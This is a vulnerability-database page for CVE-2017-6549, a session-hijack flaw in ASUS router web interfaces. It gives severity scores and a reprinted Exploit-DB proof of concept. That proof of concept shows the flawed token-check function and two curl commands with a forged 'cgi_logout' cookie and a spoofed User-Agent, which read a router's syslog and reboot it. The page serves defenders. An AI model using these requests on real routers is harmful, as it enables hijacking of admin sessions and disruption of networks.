VIR Vulnerability Intelligence Relay

CVE-2017-6549

high
Published 2017-03-09 Β· Modified 2026-05-13
πŸ’¬ Discuss on Community ✚ Propose mitigation
CVSS v3
8.8
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CVSS v4 NEW
β€”
not yet in upstream
VIR risk
9.8

Description

Session hijack vulnerability in httpd on ASUS RT-N56U, RT-N66U, RT-AC66U, RT-N66R, RT-AC66R, RT-AC68U, RT-AC68R, RT-N66W, RT-AC66W, RT-AC87R, RT-AC87U, RT-AC51U, RT-AC68P, RT-N11P, RT-N12+, RT-N12E B1, RT-AC3200, RT-AC53U, RT-AC1750, RT-AC1900P, RT-N300, and RT-AC750 routers with firmware before 3.0.0.4.380.7378; RT-AC68W routers with firmware before 3.0.0.4.380.7266; and RT-N600, RT-N12+ B1, RT-N11P B1, RT-N12VP B1, RT-N12E C1, RT-N300 B1, and RT-N12+ Pro routers with firmware before 3.0.0.4.380.9488; and Asuswrt-Merlin firmware before 380.65_2 allows remote attackers to steal any active admin session by sending cgi_logout and asusrouter-Windows-IFTTT-1.0 in certain HTTP headers.

Predictions

Exploit likelihood
92%
Patch ETA
β€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or β€” if you've already worked around this in production β€” publish your fix to the community-verified tier.

✚ Propose a mitigation on Community β†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-41572 webapps hardware text Β· 2 KB
Bruno Bierbaumer Β· 2017-03-08

ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing

text exploit Source: Exploit-DB 
Session Stealing

Component: httpd

CVE: CVE-2017-6549

Vulnerability:

httpd uses the function search_token_in_list to validate if a user is logged into the admin interface by checking his asus_token value. There seems to be a branch which could be a failed attempt to build in a logout functionality.

asus_token_t* search_token_in_list(char* token, asus_token_t **prev)
{
    asus_token_t *ptr = head;
    asus_token_t *tmp = NULL;
    int found = 0;
    char *cp = NULL;

    while(ptr != NULL)
    {
        if(!strncmp(token, ptr->token, 32)) {
            found = 1;
            break;
        }
        else if(strncmp(token, "cgi_logout", 10) == 0) {
            cp = strtok(ptr->useragent, "-");

            if(strcmp(cp, "asusrouter") != 0) {
                found = 1;
                break;
            }
        }
        else {
            tmp = ptr;
            ptr = ptr->next;
        }
    }
    
    if(found == 1) {
        if(prev)
            *prev = tmp;
        return ptr;
    }   
    else {
        return NULL;
    }
}
If an attacker sets his cookie value to cgi_logout and puts asusrouter-Windows-IFTTT-1.0 into his User-Agent header he will be treated as signed-in if any other administrator session is active.

PoC:

# read syslog
curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.1.1/syslog.txt

#reboot router
curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.1.1/apply.cgi1 -d 'action_mode=reboot&action_script=&action_wait=70'
It’s possible to execute arbitrary commands on the router if any admin session is currently active.

References

CWEs

CWE-287

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.